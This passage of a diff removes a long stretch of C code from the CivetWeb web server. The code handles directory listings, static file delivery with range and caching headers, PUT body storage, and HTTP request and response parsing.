-	conn->must_close = 1;
-	mg_printf(conn, "HTTP/1.1 200 OK\r\n");
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Date: %s\r\n"
-	          "Connection: close\r\n"
-	          "Content-Type: text/html; charset=utf-8\r\n\r\n",
-	          date);
-	mg_printf(conn,
-	          "<html><head><title>Index of %s</title>"
-	          "<style>th {text-align: left;}</style></head>"
-	          "<body><h1>Index of %s</h1><pre><table cellpadding=\"0\">"
-	          "<tr><th><a href=\"?n%c\">Name</a></th>"
-	          "<th><a href=\"?d%c\">Modified</a></th>"
-	          "<th><a href=\"?s%c\">Size</a></th></tr>"
-	          "<tr><td colspan=\"3\"><hr></td></tr>",
-	          conn->request_info.local_uri,
-	          conn->request_info.local_uri,
-	          sort_direction,
-	          sort_direction,
-	          sort_direction);
-
-	/* Print first entry - link to a parent directory */
-	mg_printf(conn,
-	          "<tr><td><a href=\"%s%s\">%s</a></td>"
-	          "<td>&nbsp;%s</td><td>&nbsp;&nbsp;%s</td></tr>\n",
-	          conn->request_info.local_uri,
-	          "..",
-	          "Parent directory",
-	          "-",
-	          "-");
-
-	/* Sort and print directory entries */
-	if (data.entries != NULL) {
-		qsort(data.entries,
-		      (size_t)data.num_entries,
-		      sizeof(data.entries[0]),
-		      compare_dir_entries);
-		for (i = 0; i < data.num_entries; i++) {
-			print_dir_entry(&data.entries[i]);
-			mg_free(data.entries[i].file_name);
-		}
-		mg_free(data.entries);
-	}
-
-	mg_printf(conn, "%s", "</table></body></html>");
-	conn->status_code = 200;
-}
-
-
-/* Send len bytes from the opened file to the client. */
-static void
-send_file_data(struct mg_connection *conn,
-               struct mg_file *filep,
-               int64_t offset,
-               int64_t len)
-{
-	char buf[MG_BUF_LEN];
-	int to_read, num_read, num_written;
-	int64_t size;
-
-	if (!filep || !conn) {
-		return;
-	}
-
-	/* Sanity check the offset */
-	size = (filep->stat.size > INT64_MAX) ? INT64_MAX
-	                                      : (int64_t)(filep->stat.size);
-	offset = (offset < 0) ? 0 : ((offset > size) ? size : offset);
-
-	if ((len > 0) && (filep->access.membuf != NULL) && (size > 0)) {
-		/* file stored in memory */
-		if (len > size - offset) {
-			len = size - offset;
-		}
-		mg_write(conn, filep->access.membuf + offset, (size_t)len);
-	} else if (len > 0 && filep->access.fp != NULL) {
-/* file stored on disk */
-#if defined(__linux__)
-		/* sendfile is only available for Linux */
-		if ((conn->ssl == 0) && (conn->throttle == 0)
-		    && (!mg_strcasecmp(conn->ctx->config[ALLOW_SENDFILE_CALL],
-		                       "yes"))) {
-			off_t sf_offs = (off_t)offset;
-			ssize_t sf_sent;
-			int sf_file = fileno(filep->access.fp);
-			int loop_cnt = 0;
-
-			do {
-				/* 2147479552 (0x7FFFF000) is a limit found by experiment on
-				 * 64 bit Linux (2^31 minus one memory page of 4k?). */
-				size_t sf_tosend =
-				    (size_t)((len < 0x7FFFF000) ? len : 0x7FFFF000);
-				sf_sent =
-				    sendfile(conn->client.sock, sf_file, &sf_offs, sf_tosend);
-				if (sf_sent > 0) {
-					len -= sf_sent;
-					offset += sf_sent;
-				} else if (loop_cnt == 0) {
-					/* This file can not be sent using sendfile.
-					 * This might be the case for pseudo-files in the
-					 * /sys/ and /proc/ file system.
-					 * Use the regular user mode copy code instead. */
-					break;
-				} else if (sf_sent == 0) {
-					/* No error, but 0 bytes sent. May be EOF? */
-					return;
-				}
-				loop_cnt++;
-
-			} while ((len > 0) && (sf_sent >= 0));
-
-			if (sf_sent > 0) {
-				return; /* OK */
-			}
-
-			/* sf_sent<0 means error, thus fall back to the classic way */
-			/* This is always the case, if sf_file is not a "normal" file,
-			 * e.g., for sending data from the output of a CGI process. */
-			offset = (int64_t)sf_offs;
-		}
-#endif
-		if ((offset > 0) && (fseeko(filep->access.fp, offset, SEEK_SET) != 0)) {
-			mg_cry(conn, "%s: fseeko() failed: %s", __func__, strerror(ERRNO));
-			mg_send_http_error(
-			    conn,
-			    500,
-			    "%s",
-			    "Error: Unable to access file at requested position.");
-		} else {
-			while (len > 0) {
-				/* Calculate how much to read from the file in the buffer */
-				to_read = sizeof(buf);
-				if ((int64_t)to_read > len) {
-					to_read = (int)len;
-				}
-
-				/* Read from file, exit the loop on error */
-				if ((num_read =
-				         (int)fread(buf, 1, (size_t)to_read, filep->access.fp))
-				    <= 0) {
-					break;
-				}
-
-				/* Send read bytes to the client, exit the loop on error */
-				if ((num_written = mg_write(conn, buf, (size_t)num_read))
-				    != num_read) {
-					break;
-				}
-
-				/* Both read and were successful, adjust counters */
-				len -= num_written;
-			}
-		}
-	}
-}
-
-
-static int
-parse_range_header(const char *header, int64_t *a, int64_t *b)
-{
-	return sscanf(header, "bytes=%" INT64_FMT "-%" INT64_FMT, a, b);
-}
-
-
-static void
-construct_etag(char *buf, size_t buf_len, const struct mg_file_stat *filestat)
-{
-	if ((filestat != NULL) && (buf != NULL)) {
-		mg_snprintf(NULL,
-		            NULL, /* All calls to construct_etag use 64 byte buffer */
-		            buf,
-		            buf_len,
-		            "\"%lx.%" INT64_FMT "\"",
-		            (unsigned long)filestat->last_modified,
-		            filestat->size);
-	}
-}
-
-
-static void
-fclose_on_exec(struct mg_file_access *filep, struct mg_connection *conn)
-{
-	if (filep != NULL && filep->fp != NULL) {
-#ifdef _WIN32
-		(void)conn; /* Unused. */
-#else
-		if (fcntl(fileno(filep->fp), F_SETFD, FD_CLOEXEC) != 0) {
-			mg_cry(conn,
-			       "%s: fcntl(F_SETFD FD_CLOEXEC) failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-#endif
-	}
-}
-
-
-static void
-handle_static_file_request(struct mg_connection *conn,
-                           const char *path,
-                           struct mg_file *filep,
-                           const char *mime_type,
-                           const char *additional_headers)
-{
-	char date[64], lm[64], etag[64];
-	char range[128]; /* large enough, so there will be no overflow */
-	const char *msg = "OK", *hdr;
-	time_t curtime = time(NULL);
-	int64_t cl, r1, r2;
-	struct vec mime_vec;
-	int n, truncated;
-	char gz_path[PATH_MAX];
-	const char *encoding = "";
-	const char *cors1, *cors2, *cors3;
-	int allow_on_the_fly_compression;
-
-	if ((conn == NULL) || (conn->ctx == NULL) || (filep == NULL)) {
-		return;
-	}
-
-	if (mime_type == NULL) {
-		get_mime_type(conn->ctx, path, &mime_vec);
-	} else {
-		mime_vec.ptr = mime_type;
-		mime_vec.len = strlen(mime_type);
-	}
-	if (filep->stat.size > INT64_MAX) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: File size is too large to send\n%" INT64_FMT,
-		                   filep->stat.size);
-		return;
-	}
-	cl = (int64_t)filep->stat.size;
-	conn->status_code = 200;
-	range[0] = '\0';
-
-	/* if this file is in fact a pre-gzipped file, rewrite its filename
-	 * it's important to rewrite the filename after resolving
-	 * the mime type from it, to preserve the actual file's type */
-	allow_on_the_fly_compression = conn->accept_gzip;
-
-	if (filep->stat.is_gzipped) {
-		mg_snprintf(conn, &truncated, gz_path, sizeof(gz_path), "%s.gz", path);
-
-		if (truncated) {
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: Path of zipped file too long (%s)",
-			                   path);
-			return;
-		}
-
-		path = gz_path;
-		encoding = "Content-Encoding: gzip\r\n";
-
-		/* File is already compressed. No "on the fly" compression. */
-		allow_on_the_fly_compression = 0;
-	}
-
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, filep)) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot open file\nfopen(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	fclose_on_exec(&filep->access, conn);
-
-	/* If Range: header specified, act accordingly */
-	r1 = r2 = 0;
-	hdr = mg_get_header(conn, "Range");
-	if ((hdr != NULL) && ((n = parse_range_header(hdr, &r1, &r2)) > 0)
-	    && (r1 >= 0) && (r2 >= 0)) {
-		/* actually, range requests don't play well with a pre-gzipped
-		 * file (since the range is specified in the uncompressed space) */
-		if (filep->stat.is_gzipped) {
-			mg_send_http_error(
-			    conn,
-			    416, /* 416 = Range Not Satisfiable */
-			    "%s",
-			    "Error: Range requests in gzipped files are not supported");
-			(void)mg_fclose(
-			    &filep->access); /* ignore error on read only file */
-			return;
-		}
-		conn->status_code = 206;
-		cl = (n == 2) ? (((r2 > cl) ? cl : r2) - r1 + 1) : (cl - r1);
-		mg_snprintf(conn,
-		            NULL, /* range buffer is big enough */
-		            range,
-		            sizeof(range),
-		            "Content-Range: bytes "
-		            "%" INT64_FMT "-%" INT64_FMT "/%" INT64_FMT "\r\n",
-		            r1,
-		            r1 + cl - 1,
-		            filep->stat.size);
-		msg = "Partial Content";
-
-		/* Do not compress ranges. */
-		allow_on_the_fly_compression = 0;
-	}
-
-	hdr = mg_get_header(conn, "Origin");
-	if (hdr) {
-		/* Cross-origin resource sharing (CORS), see
-		 * http://www.html5rocks.com/en/tutorials/cors/,
-		 * http://www.html5rocks.com/static/images/cors_server_flowchart.png
-		 * -
-		 * preflight is not supported for files. */
-		cors1 = "Access-Control-Allow-Origin: ";
-		cors2 = conn->ctx->config[ACCESS_CONTROL_ALLOW_ORIGIN];
-		cors3 = "\r\n";
-	} else {
-		cors1 = cors2 = cors3 = "";
-	}
-
-	/* Prepare Etag, Date, Last-Modified headers. Must be in UTC,
-	 * according to
-	 * http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.3 */
-	gmt_time_string(date, sizeof(date), &curtime);
-	gmt_time_string(lm, sizeof(lm), &filep->stat.last_modified);
-	construct_etag(etag, sizeof(etag), &filep->stat);
-
-	/* On the fly compression allowed */
-	if (allow_on_the_fly_compression) {
-		;
-		/* TODO: add interface to compression module */
-		/* e.g., def from https://zlib.net/zlib_how.html */
-		/* Check license (zlib has a permissive license, but */
-		/* is still not MIT) and use dynamic binding like */
-		/* done with OpenSSL */
-		/* See #199 (https://github.com/civetweb/civetweb/issues/199) */
-	}
-
-	/* Send header */
-	(void)mg_printf(conn,
-	                "HTTP/1.1 %d %s\r\n"
-	                "%s%s%s"
-	                "Date: %s\r\n",
-	                conn->status_code,
-	                msg,
-	                cors1,
-	                cors2,
-	                cors3,
-	                date);
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-
-	(void)mg_printf(conn,
-	                "Last-Modified: %s\r\n"
-	                "Etag: %s\r\n"
-	                "Content-Type: %.*s\r\n"
-	                "Content-Length: %" INT64_FMT "\r\n"
-	                "Connection: %s\r\n"
-	                "Accept-Ranges: bytes\r\n"
-	                "%s%s",
-	                lm,
-	                etag,
-	                (int)mime_vec.len,
-	                mime_vec.ptr,
-	                cl,
-	                suggest_connection_header(conn),
-	                range,
-	                encoding);
-
-	/* The previous code must not add any header starting with X- to make
-	 * sure no one of the additional_headers is included twice */
-
-	if (additional_headers != NULL) {
-		(void)mg_printf(conn,
-		                "%.*s\r\n\r\n",
-		                (int)strlen(additional_headers),
-		                additional_headers);
-	} else {
-		(void)mg_printf(conn, "\r\n");
-	}
-
-	if (strcmp(conn->request_info.request_method, "HEAD") != 0) {
-		send_file_data(conn, filep, r1, cl);
-	}
-	(void)mg_fclose(&filep->access); /* ignore error on read only file */
-}
-
-
-#if !defined(NO_CACHING)
-static void
-handle_not_modified_static_file_request(struct mg_connection *conn,
-                                        struct mg_file *filep)
-{
-	char date[64], lm[64], etag[64];
-	time_t curtime = time(NULL);
-
-	if ((conn == NULL) || (filep == NULL)) {
-		return;
-	}
-	conn->status_code = 304;
-	gmt_time_string(date, sizeof(date), &curtime);
-	gmt_time_string(lm, sizeof(lm), &filep->stat.last_modified);
-	construct_etag(etag, sizeof(etag), &filep->stat);
-
-	(void)mg_printf(conn,
-	                "HTTP/1.1 %d %s\r\n"
-	                "Date: %s\r\n",
-	                conn->status_code,
-	                mg_get_response_code_text(conn, conn->status_code),
-	                date);
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-	(void)mg_printf(conn,
-	                "Last-Modified: %s\r\n"
-	                "Etag: %s\r\n"
-	                "Connection: %s\r\n"
-	                "\r\n",
-	                lm,
-	                etag,
-	                suggest_connection_header(conn));
-}
-#endif
-
-
-void
-mg_send_file(struct mg_connection *conn, const char *path)
-{
-	mg_send_mime_file(conn, path, NULL);
-}
-
-
-void
-mg_send_mime_file(struct mg_connection *conn,
-                  const char *path,
-                  const char *mime_type)
-{
-	mg_send_mime_file2(conn, path, mime_type, NULL);
-}
-
-
-void
-mg_send_mime_file2(struct mg_connection *conn,
-                   const char *path,
-                   const char *mime_type,
-                   const char *additional_headers)
-{
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-
-	if (!conn) {
-		/* No conn */
-		return;
-	}
-
-	if (mg_stat(conn, path, &file.stat)) {
-		if (file.stat.is_directory) {
-			if (!mg_strcasecmp(conn->ctx->config[ENABLE_DIRECTORY_LISTING],
-			                   "yes")) {
-				handle_directory_request(conn, path);
-			} else {
-				mg_send_http_error(conn,
-				                   403,
-				                   "%s",
-				                   "Error: Directory listing denied");
-			}
-		} else {
-			handle_static_file_request(
-			    conn, path, &file, mime_type, additional_headers);
-		}
-	} else {
-		mg_send_http_error(conn, 404, "%s", "Error: File not found");
-	}
-}
-
-
-/* For a given PUT path, create all intermediate subdirectories.
- * Return  0  if the path itself is a directory.
- * Return  1  if the path leads to a file.
- * Return -1  for if the path is too long.
- * Return -2  if path can not be created.
-*/
-static int
-put_dir(struct mg_connection *conn, const char *path)
-{
-	char buf[PATH_MAX];
-	const char *s, *p;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	size_t len;
-	int res = 1;
-
-	for (s = p = path + 2; (p = strchr(s, '/')) != NULL; s = ++p) {
-		len = (size_t)(p - path);
-		if (len >= sizeof(buf)) {
-			/* path too long */
-			res = -1;
-			break;
-		}
-		memcpy(buf, path, len);
-		buf[len] = '\0';
-
-		/* Try to create intermediate directory */
-		DEBUG_TRACE("mkdir(%s)", buf);
-		if (!mg_stat(conn, buf, &file.stat) && mg_mkdir(conn, buf, 0755) != 0) {
-			/* path does not exixt and can not be created */
-			res = -2;
-			break;
-		}
-
-		/* Is path itself a directory? */
-		if (p[1] == '\0') {
-			res = 0;
-		}
-	}
-
-	return res;
-}
-
-
-static void
-remove_bad_file(const struct mg_connection *conn, const char *path)
-{
-	int r = mg_remove(conn, path);
-	if (r != 0) {
-		mg_cry(conn, "%s: Cannot remove invalid file %s", __func__, path);
-	}
-}
-
-
-long long
-mg_store_body(struct mg_connection *conn, const char *path)
-{
-	char buf[MG_BUF_LEN];
-	long long len = 0;
-	int ret, n;
-	struct mg_file fi;
-
-	if (conn->consumed_content != 0) {
-		mg_cry(conn, "%s: Contents already consumed", __func__);
-		return -11;
-	}
-
-	ret = put_dir(conn, path);
-	if (ret < 0) {
-		/* -1 for path too long,
-		 * -2 for path can not be created. */
-		return ret;
-	}
-	if (ret != 1) {
-		/* Return 0 means, path itself is a directory. */
-		return 0;
-	}
-
-	if (mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &fi) == 0) {
-		return -12;
-	}
-
-	ret = mg_read(conn, buf, sizeof(buf));
-	while (ret > 0) {
-		n = (int)fwrite(buf, 1, (size_t)ret, fi.access.fp);
-		if (n != ret) {
-			(void)mg_fclose(
-			    &fi.access); /* File is bad and will be removed anyway. */
-			remove_bad_file(conn, path);
-			return -13;
-		}
-		len += ret;
-		ret = mg_read(conn, buf, sizeof(buf));
-	}
-
-	/* File is open for writing. If fclose fails, there was probably an
-	 * error flushing the buffer to disk, so the file on disk might be
-	 * broken. Delete it and return an error to the caller. */
-	if (mg_fclose(&fi.access) != 0) {
-		remove_bad_file(conn, path);
-		return -14;
-	}
-
-	return len;
-}
-
-
-/* Parse a buffer:
- * Forward the string pointer till the end of a word, then
- * terminate it and forward till the begin of the next word.
- */
-static int
-skip_to_end_of_word_and_terminate(char **ppw, int eol)
-{
-	/* Forward until a space is found - use isgraph here */
-	/* See http://www.cplusplus.com/reference/cctype/ */
-	while (isgraph(**ppw)) {
-		(*ppw)++;
-	}
-
-	/* Check end of word */
-	if (eol) {
-		/* must be a end of line */
-		if ((**ppw != '\r') && (**ppw != '\n')) {
-			return -1;
-		}
-	} else {
-		/* must be a end of a word, but not a line */
-		if (**ppw != ' ') {
-			return -1;
-		}
-	}
-
-	/* Terminate and forward to the next word */
-	do {
-		**ppw = 0;
-		(*ppw)++;
-	} while ((**ppw) && isspace(**ppw));
-
-	/* Check after term */
-	if (!eol) {
-		/* if it's not the end of line, there must be a next word */
-		if (!isgraph(**ppw)) {
-			return -1;
-		}
-	}
-
-	/* ok */
-	return 1;
-}
-
-
-/* Parse HTTP headers from the given buffer, advance buf pointer
- * to the point where parsing stopped.
- * All parameters must be valid pointers (not NULL).
- * Return <0 on error. */
-static int
-parse_http_headers(char **buf, struct mg_header hdr[MG_MAX_HEADERS])
-{
-	int i;
-	int num_headers = 0;
-
-	for (i = 0; i < (int)MG_MAX_HEADERS; i++) {
-		char *dp = *buf;
-		while ((*dp != ':') && (*dp >= 33) && (*dp <= 126)) {
-			dp++;
-		}
-		if (dp == *buf) {
-			/* End of headers reached. */
-			break;
-		}
-		if (*dp != ':') {
-			/* This is not a valid field. */
-			return -1;
-		}
-
-		/* End of header key (*dp == ':') */
-		/* Truncate here and set the key name */
-		*dp = 0;
-		hdr[i].name = *buf;
-		do {
-			dp++;
-		} while (*dp == ' ');
-
-		/* The rest of the line is the value */
-		hdr[i].value = dp;
-		*buf = dp + strcspn(dp, "\r\n");
-		if (((*buf)[0] != '\r') || ((*buf)[1] != '\n')) {
-			*buf = NULL;
-		}
-
-		num_headers = i + 1;
-		if (*buf) {
-			(*buf)[0] = 0;
-			(*buf)[1] = 0;
-			*buf += 2;
-		} else {
-			*buf = dp;
-			break;
-		}
-
-		if ((*buf)[0] == '\r') {
-			/* This is the end of the header */
-			break;
-		}
-	}
-	return num_headers;
-}
-
-
-struct mg_http_method_info {
-	const char *name;
-	int request_has_body;
-	int response_has_body;
-	int is_safe;
-	int is_idempotent;
-	int is_cacheable;
-};
-
-
-/* https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods */
-static struct mg_http_method_info http_methods[] = {
-    /* HTTP (RFC 2616) */
-    {"GET", 0, 1, 1, 1, 1},
-    {"POST", 1, 1, 0, 0, 0},
-    {"PUT", 1, 0, 0, 1, 0},
-    {"DELETE", 0, 0, 0, 1, 0},
-    {"HEAD", 0, 0, 1, 1, 1},
-    {"OPTIONS", 0, 0, 1, 1, 0},
-    {"CONNECT", 1, 1, 0, 0, 0},
-    /* TRACE method (RFC 2616) is not supported for security reasons */
-
-    /* PATCH method (RFC 5789) */
-    {"PATCH", 1, 0, 0, 0, 0},
-    /* PATCH method only allowed for CGI/Lua/LSP and callbacks. */
-
-    /* WEBDAV (RFC 2518) */
-    {"PROPFIND", 0, 1, 1, 1, 0},
-    /* http://www.webdav.org/specs/rfc4918.html, 9.1:
-     * Some PROPFIND results MAY be cached, with care,
-     * as there is no cache validation mechanism for
-     * most properties. This method is both safe and
-     * idempotent (see Section 9.1 of [RFC2616]). */
-    {"MKCOL", 0, 0, 0, 1, 0},
-    /* http://www.webdav.org/specs/rfc4918.html, 9.1:
-     * When MKCOL is invoked without a request body,
-     * the newly created collection SHOULD have no
-     * members. A MKCOL request message may contain
-     * a message body. The precise behavior of a MKCOL
-     * request when the body is present is undefined,
-     * ... ==> We do not support MKCOL with body data.
-     * This method is idempotent, but not safe (see
-     * Section 9.1 of [RFC2616]). Responses to this
-     * method MUST NOT be cached. */
-
-    /* Unsupported WEBDAV Methods: */
-    /* PROPPATCH, COPY, MOVE, LOCK, UNLOCK (RFC 2518) */
-    /* + 11 methods from RFC 3253 */
-    /* ORDERPATCH (RFC 3648) */
-    /* ACL (RFC 3744) */
-    /* SEARCH (RFC 5323) */
-    /* + MicroSoft extensions
-     * https://msdn.microsoft.com/en-us/library/aa142917.aspx */
-
-    /* REPORT method (RFC 3253) */
-    {"REPORT", 1, 1, 1, 1, 1},
-    /* REPORT method only allowed for CGI/Lua/LSP and callbacks. */
-    /* It was defined for WEBDAV in RFC 3253, Sec. 3.6
-     * (https://tools.ietf.org/html/rfc3253#section-3.6), but seems
-     * to be useful for REST in case a "GET request with body" is
-     * required. */
-
-    {NULL, 0, 0, 0, 0, 0}
-    /* end of list */
-};
-
-
-static const struct mg_http_method_info *
-get_http_method_info(const char *method)
-{
-	/* Check if the method is known to the server. The list of all known
-	 * HTTP methods can be found here at
-	 * http://www.iana.org/assignments/http-methods/http-methods.xhtml
-	 */
-	const struct mg_http_method_info *m = http_methods;
-
-	while (m->name) {
-		if (!strcmp(m->name, method)) {
-			return m;
-		}
-		m++;
-	}
-	return NULL;
-}
-
-
-static int
-is_valid_http_method(const char *method)
-{
-	return (get_http_method_info(method) != NULL);
-}
-
-
-/* Parse HTTP request, fill in mg_request_info structure.
- * This function modifies the buffer by NUL-terminating
- * HTTP request components, header names and header values.
- * Parameters:
- *   buf (in/out): pointer to the HTTP header to parse and split
- *   len (in): length of HTTP header buffer
- *   re (out): parsed header as mg_request_info
- * buf and ri must be valid pointers (not NULL), len>0.
- * Returns <0 on error. */
-static int
-parse_http_request(char *buf, int len, struct mg_request_info *ri)
-{
-	int request_length;
-	int init_skip = 0;
-
-	/* Reset attributes. DO NOT TOUCH is_ssl, remote_ip, remote_addr,
-	 * remote_port */
-	ri->remote_user = ri->request_method = ri->request_uri = ri->http_version =
-	    NULL;
-	ri->num_headers = 0;
-
-	/* RFC says that all initial whitespaces should be ingored */
-	/* This included all leading \r and \n (isspace) */
-	/* See table: http://www.cplusplus.com/reference/cctype/ */
-	while ((len > 0) && isspace(*(unsigned char *)buf)) {
-		buf++;
-		len--;
-		init_skip++;
-	}
-
-	if (len == 0) {
-		/* Incomplete request */
-		return 0;
-	}
-
-	/* Control characters are not allowed, including zero */
-	if (iscntrl(*(unsigned char *)buf)) {
-		return -1;
-	}
-
-	/* Find end of HTTP header */
-	request_length = get_http_header_len(buf, len);
-	if (request_length <= 0) {
-		return request_length;
-	}
-	buf[request_length - 1] = '\0';
-
-	if ((*buf == 0) || (*buf == '\r') || (*buf == '\n')) {
-		return -1;
-	}
-
-	/* The first word has to be the HTTP method */
-	ri->request_method = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	/* Check for a valid http method */
-	if (!is_valid_http_method(ri->request_method)) {
-		return -1;
-	}
-
-	/* The second word is the URI */
-	ri->request_uri = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	/* Next would be the HTTP version */
-	ri->http_version = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 1) <= 0) {
-		return -1;
-	}
-
-	/* Check for a valid HTTP version key */
-	if (strncmp(ri->http_version, "HTTP/", 5) != 0) {
-		/* Invalid request */
-		return -1;
-	}
-	ri->http_version += 5;
-
-
-	/* Parse all HTTP headers */
-	ri->num_headers = parse_http_headers(&buf, ri->http_headers);
-	if (ri->num_headers < 0) {
-		/* Error while parsing headers */
-		return -1;
-	}
-
-	return request_length + init_skip;
-}
-
-
-static int
-parse_http_response(char *buf, int len, struct mg_response_info *ri)
-{
-	int response_length;
-	int init_skip = 0;
-	char *tmp, *tmp2;
-	long l;
-
-	/* Initialize elements. */
-	ri->http_version = ri->status_text = NULL;
-	ri->num_headers = ri->status_code = 0;
-
-	/* RFC says that all initial whitespaces should be ingored */
-	/* This included all leading \r and \n (isspace) */
-	/* See table: http://www.cplusplus.com/reference/cctype/ */
-	while ((len > 0) && isspace(*(unsigned char *)buf)) {
-		buf++;
-		len--;
-		init_skip++;
-	}
-
-	if (len == 0) {
-		/* Incomplete request */
-		return 0;
-	}
-
-	/* Control characters are not allowed, including zero */
-	if (iscntrl(*(unsigned char *)buf)) {
-		return -1;
-	}
-
-	/* Find end of HTTP header */
-	response_length = get_http_header_len(buf, len);
-	if (response_length <= 0) {
-		return response_length;
-	}
-	buf[response_length - 1] = '\0';
-
-
-	/* TODO: Define mg_response_info and implement parsing */
-	(void)buf;
-	(void)len;
-	(void)ri;
-
-	/* RFC says that all initial whitespaces should be ingored */
-	while ((*buf != '\0') && isspace(*(unsigned char *)buf)) {
-		buf++;
-	}
-	if ((*buf == 0) || (*buf == '\r') || (*buf == '\n')) {
-		return -1;
-	}
-
-	/* The first word is the HTTP version */
-	/* Check for a valid HTTP version key */
-	if (strncmp(buf, "HTTP/", 5) != 0) {
-		/* Invalid request */
-		return -1;
-	}
-	buf += 5;
-	if (!isgraph(buf[0])) {
-		/* Invalid request */
-		return -1;
-	}
-	ri->http_version = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	/* The second word is the status as a number */
-	tmp = buf;
-
-	if (skip_to_end_of_word_and_terminate(&buf, 0) <= 0) {
-		return -1;
-	}
-
-	l = strtol(tmp, &tmp2, 10);
-	if ((l < 100) || (l >= 1000) || ((tmp2 - tmp) != 3) || (*tmp2 != 0)) {
-		/* Everything else but a 3 digit code is invalid */
-		return -1;
-	}
-	ri->status_code = (int)l;
-
-	/* The rest of the line is the status text */
-	ri->status_text = buf;
-
-	/* Find end of status text */
-	/* isgraph or isspace = isprint */
-	while (isprint(*buf)) {
-		buf++;
-	}
-	if ((*buf != '\r') && (*buf != '\n')) {
-		return -1;
-	}
-	/* Terminate string and forward buf to next line */
-	do {
-		*buf = 0;
-		buf++;
-	} while ((*buf) && isspace(*buf));
-
-
-	/* Parse all HTTP headers */
-	ri->num_headers = parse_http_headers(&buf, ri->http_headers);
-	if (ri->num_headers < 0) {
-		/* Error while parsing headers */
-		return -1;
-	}
-
-	return response_length + init_skip;
-}
-
-
-/* Keep reading the input (either opened file descriptor fd, or socket sock,
- * or SSL descriptor ssl) into buffer buf, until \r\n\r\n appears in the
- * buffer (which marks the end of HTTP request). Buffer buf may already
- * have some data. The length of the data is stored in nread.
- * Upon every read operation, increase nread by the number of bytes read. */
-static int
-read_message(FILE *fp,
-             struct mg_connection *conn,
-             char *buf,
-             int bufsiz,
-             int *nread)
-{
-	int request_len, n = 0;
-	struct timespec last_action_time;
-	double request_timeout;
-
-	if (!conn) {
-		return 0;
-	}
-
-	memset(&last_action_time, 0, sizeof(last_action_time));
-
-	if (conn->ctx->config[REQUEST_TIMEOUT]) {
-		/* value of request_timeout is in seconds, config in milliseconds */
-		request_timeout = atof(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	} else {
-		request_timeout = -1.0;
-	}
-	if (conn->handled_requests > 0) {
-		if (conn->ctx->config[KEEP_ALIVE_TIMEOUT]) {
-			request_timeout =
-			    atof(conn->ctx->config[KEEP_ALIVE_TIMEOUT]) / 1000.0;
-		}
-	}
-
-	request_len = get_http_header_len(buf, *nread);
-
-	/* first time reading from this connection */
-	clock_gettime(CLOCK_MONOTONIC, &last_action_time);
-
-	while (request_len == 0) {
-		/* Full request not yet received */
-		if (conn->ctx->stop_flag != 0) {
-			/* Server is to be stopped. */
-			return -1;
-		}
-
-		if (*nread >= bufsiz) {
-			/* Request too long */
-			return -2;
-		}
-
-		n = pull_inner(
-		    fp, conn, buf + *nread, bufsiz - *nread, request_timeout);
-		if (n == -2) {
-			/* Receive error */
-			return -1;
-		}
-		if (n > 0) {
-			*nread += n;
-			request_len = get_http_header_len(buf, *nread);
-		} else {
-			request_len = 0;
-		}
-
-		if ((request_len == 0) && (request_timeout >= 0)) {
-			if (mg_difftimespec(&last_action_time, &(conn->req_time))
-			    > request_timeout) {
-				/* Timeout */
-				return -1;
-			}
-			clock_gettime(CLOCK_MONOTONIC, &last_action_time);
-		}
-	}
-
-	return request_len;
-}
-
-
-#if !defined(NO_CACHING)
-/* Return True if we should reply 304 Not Modified. */
-static int
-is_not_modified(const struct mg_connection *conn,
-                const struct mg_file_stat *filestat)
-{
-	char etag[64];
-	const char *ims = mg_get_header(conn, "If-Modified-Since");
-	const char *inm = mg_get_header(conn, "If-None-Match");
-	construct_etag(etag, sizeof(etag), filestat);
-
-	return ((inm != NULL) && !mg_strcasecmp(etag, inm))
-	       || ((ims != NULL)
-	           && (filestat->last_modified <= parse_date_string(ims)));
-}
-#endif /* !NO_CACHING */
-
-
-#if !defined(NO_CGI) || !defined(NO_FILES)
-static int
-forward_body_data(struct mg_connection *conn, FILE *fp, SOCKET sock, SSL *ssl)
-{
-	const char *expect, *body;
-	char buf[MG_BUF_LEN];
-	int to_read, nread, success = 0;
-	int64_t buffered_len;
-	double timeout = -1.0;
-
-	if (!conn) {
-		return 0;
-	}
-	if (conn->ctx->config[REQUEST_TIMEOUT]) {
-		timeout = atoi(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-
-	expect = mg_get_header(conn, "Expect");
-	/* assert(fp != NULL); */
-	if (!fp) {
-		mg_send_http_error(conn, 500, "%s", "Error: NULL File");
-		return 0;
-	}
-
-	if ((conn->content_len == -1) && (!conn->is_chunked)) {
-		/* Content length is not specified by the client. */
-		mg_send_http_error(conn,
-		                   411,
-		                   "%s",
-		                   "Error: Client did not specify content length");
-	} else if ((expect != NULL)
-	           && (mg_strcasecmp(expect, "100-continue") != 0)) {
-		/* Client sent an "Expect: xyz" header and xyz is not 100-continue.
-		 */
-		mg_send_http_error(conn,
-		                   417,
-		                   "Error: Can not fulfill expectation %s",
-		                   expect);
-	} else {
-		if (expect != NULL) {
-			(void)mg_printf(conn, "%s", "HTTP/1.1 100 Continue\r\n\r\n");
-			conn->status_code = 100;
-		} else {
-			conn->status_code = 200;
-		}
-
-		buffered_len = (int64_t)(conn->data_len) - (int64_t)conn->request_len
-		               - conn->consumed_content;
-
-		/* assert(buffered_len >= 0); */
-		/* assert(conn->consumed_content == 0); */
-
